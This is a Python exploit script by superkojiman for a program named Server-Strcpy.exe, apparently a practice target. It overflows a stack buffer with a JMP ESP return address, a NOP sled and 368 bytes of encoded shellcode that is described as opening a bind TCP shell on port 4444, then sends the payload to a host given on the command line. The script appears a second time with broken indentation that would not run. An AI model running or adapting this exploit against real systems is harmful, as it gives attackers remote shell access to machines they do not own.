superkojiman/serverstrcpy.py

## serverstrcpy.py
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com

import socket, sys

def main(target, port):
	# 368 bytes, opens a bind TCP shell on port 4444
	shellcode = (
	"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
	"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\x7d\x06\xb8\x9b" +
	"\x95\x4f\x43\x64\x65\x30\xcd\x81\x54\x62\xa9\xc2\xc4\xb2" +
	"\xb9\x87\xe4\x39\xef\x33\x7f\x4f\x38\x33\xc8\xfa\x1e\x7a" +
	"\xc9\xca\x9e\xd0\x09\x4c\x63\x2b\x5d\xae\x5a\xe4\x90\xaf" +
	"\x9b\x19\x5a\xfd\x74\x55\xc8\x12\xf0\x2b\xd0\x13\xd6\x27" +
	"\x68\x6c\x53\xf7\x1c\xc6\x5a\x28\x8c\x5d\x14\xd0\xa7\x3a" +
	"\x85\xe1\x64\x59\xf9\xa8\x01\xaa\x89\x2a\xc3\xe2\x72\x1d" +
	"\x2b\xa8\x4c\x91\xa6\xb0\x89\x16\x58\xc7\xe1\x64\xe5\xd0" +
	"\x31\x16\x31\x54\xa4\xb0\xb2\xce\x0c\x40\x17\x88\xc7\x4e" +
	"\xdc\xde\x80\x52\xe3\x33\xbb\x6f\x68\xb2\x6c\xe6\x2a\x91" +
	"\xa8\xa2\xe9\xb8\xe9\x0e\x5c\xc4\xea\xf7\x01\x60\x60\x15" +
	"\x56\x12\x2b\x72\x9b\x29\xd4\x82\xb3\x3a\xa7\xb0\x1c\x91" +
	"\x2f\xf9\xd5\x3f\xb7\xfe\xcc\xf8\x27\x01\xee\xf8\x6e\xc6" +
	"\xba\xa8\x18\xef\xc2\x22\xd9\x10\x17\xe4\x89\xbe\xc7\x45" +
	"\x7a\x7f\xb7\x2d\x90\x70\xe8\x4e\x9b\x5a\x9f\x48\x55\xbe" +
	"\xcc\x3e\x94\x40\xe3\xe2\x11\xa6\x69\x0b\x74\x70\x05\xe9" +
	"\xa3\x49\xb2\x12\x86\xe5\x6b\x85\x9e\xe3\xab\xaa\x1e\x26" +
	"\x98\x07\xb6\xa1\x6a\x44\x03\xd3\x6d\x41\x23\x9a\x56\x02" +
	"\xb9\xf2\x15\xb2\xbe\xde\xcd\x57\x2c\x85\x0d\x11\x4d\x12" +
	"\x5a\x76\xa3\x6b\x0e\x6a\x9a\xc5\x2c\x77\x7a\x2d\xf4\xac" +
	"\xbf\xb0\xf5\x21\xfb\x96\xe5\xff\x04\x93\x51\x50\x53\x4d" +
	"\x0f\x16\x0d\x3f\xf9\xc0\xe2\xe9\x6d\x94\xc8\x29\xeb\x99" +
	"\x04\xdc\x13\x2b\xf1\x99\x2c\x84\x95\x2d\x55\xf8\x05\xd1" +
	"\x8c\xb8\x36\x98\x8c\xe9\xde\x45\x45\xa8\x82\x75\xb0\xef" +
	"\xba\xf5\x30\x90\x38\xe5\x31\x95\x05\xa1\xaa\xe7\x16\x44" +
	"\xcc\x54\x16\x4d")

	# JMP ESP at 77DF2740
	buffer =  "\x41" * 268 + "\x40\x27\xDF\x77"
	buffer += "\x90" * 20 + shellcode + "\xCC" * 819

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target, int(port)))
	print "[+] sending payload of length", len(buffer)
	s.send(buffer)
	s.close()
	print "[+] done"

if __name__ == "__main__":
	main(sys.argv[1], sys.argv[2])
	#!/usr/bin/env python
	# Server-Strcpy.exe exploit by superkojiman
	# http://blog.techorganic.com

	import socket, sys

	def main(target, port):
	# 368 bytes, opens a bind TCP shell on port 4444
	shellcode = (
	"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
	"\xb1\x56\x83\xeb\xfc\x31\x53\x14\x03\x53\x7d\x06\xb8\x9b" +
	"\x95\x4f\x43\x64\x65\x30\xcd\x81\x54\x62\xa9\xc2\xc4\xb2" +
	"\xb9\x87\xe4\x39\xef\x33\x7f\x4f\x38\x33\xc8\xfa\x1e\x7a" +
	"\xc9\xca\x9e\xd0\x09\x4c\x63\x2b\x5d\xae\x5a\xe4\x90\xaf" +
	"\x9b\x19\x5a\xfd\x74\x55\xc8\x12\xf0\x2b\xd0\x13\xd6\x27" +
	"\x68\x6c\x53\xf7\x1c\xc6\x5a\x28\x8c\x5d\x14\xd0\xa7\x3a" +
	"\x85\xe1\x64\x59\xf9\xa8\x01\xaa\x89\x2a\xc3\xe2\x72\x1d" +
	"\x2b\xa8\x4c\x91\xa6\xb0\x89\x16\x58\xc7\xe1\x64\xe5\xd0" +
	"\x31\x16\x31\x54\xa4\xb0\xb2\xce\x0c\x40\x17\x88\xc7\x4e" +
	"\xdc\xde\x80\x52\xe3\x33\xbb\x6f\x68\xb2\x6c\xe6\x2a\x91" +
	"\xa8\xa2\xe9\xb8\xe9\x0e\x5c\xc4\xea\xf7\x01\x60\x60\x15" +
	"\x56\x12\x2b\x72\x9b\x29\xd4\x82\xb3\x3a\xa7\xb0\x1c\x91" +
	"\x2f\xf9\xd5\x3f\xb7\xfe\xcc\xf8\x27\x01\xee\xf8\x6e\xc6" +
	"\xba\xa8\x18\xef\xc2\x22\xd9\x10\x17\xe4\x89\xbe\xc7\x45" +
	"\x7a\x7f\xb7\x2d\x90\x70\xe8\x4e\x9b\x5a\x9f\x48\x55\xbe" +
	"\xcc\x3e\x94\x40\xe3\xe2\x11\xa6\x69\x0b\x74\x70\x05\xe9" +
	"\xa3\x49\xb2\x12\x86\xe5\x6b\x85\x9e\xe3\xab\xaa\x1e\x26" +
	"\x98\x07\xb6\xa1\x6a\x44\x03\xd3\x6d\x41\x23\x9a\x56\x02" +
	"\xb9\xf2\x15\xb2\xbe\xde\xcd\x57\x2c\x85\x0d\x11\x4d\x12" +
	"\x5a\x76\xa3\x6b\x0e\x6a\x9a\xc5\x2c\x77\x7a\x2d\xf4\xac" +
	"\xbf\xb0\xf5\x21\xfb\x96\xe5\xff\x04\x93\x51\x50\x53\x4d" +
	"\x0f\x16\x0d\x3f\xf9\xc0\xe2\xe9\x6d\x94\xc8\x29\xeb\x99" +
	"\x04\xdc\x13\x2b\xf1\x99\x2c\x84\x95\x2d\x55\xf8\x05\xd1" +
	"\x8c\xb8\x36\x98\x8c\xe9\xde\x45\x45\xa8\x82\x75\xb0\xef" +
	"\xba\xf5\x30\x90\x38\xe5\x31\x95\x05\xa1\xaa\xe7\x16\x44" +
	"\xcc\x54\x16\x4d")

	# JMP ESP at 77DF2740
	buffer = "\x41" * 268 + "\x40\x27\xDF\x77"
	buffer += "\x90" * 20 + shellcode + "\xCC" * 819

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target, int(port)))
	print "[+] sending payload of length", len(buffer)
	s.send(buffer)
	s.close()
	print "[+] done"

	if __name__ == "__main__":
	main(sys.argv[1], sys.argv[2])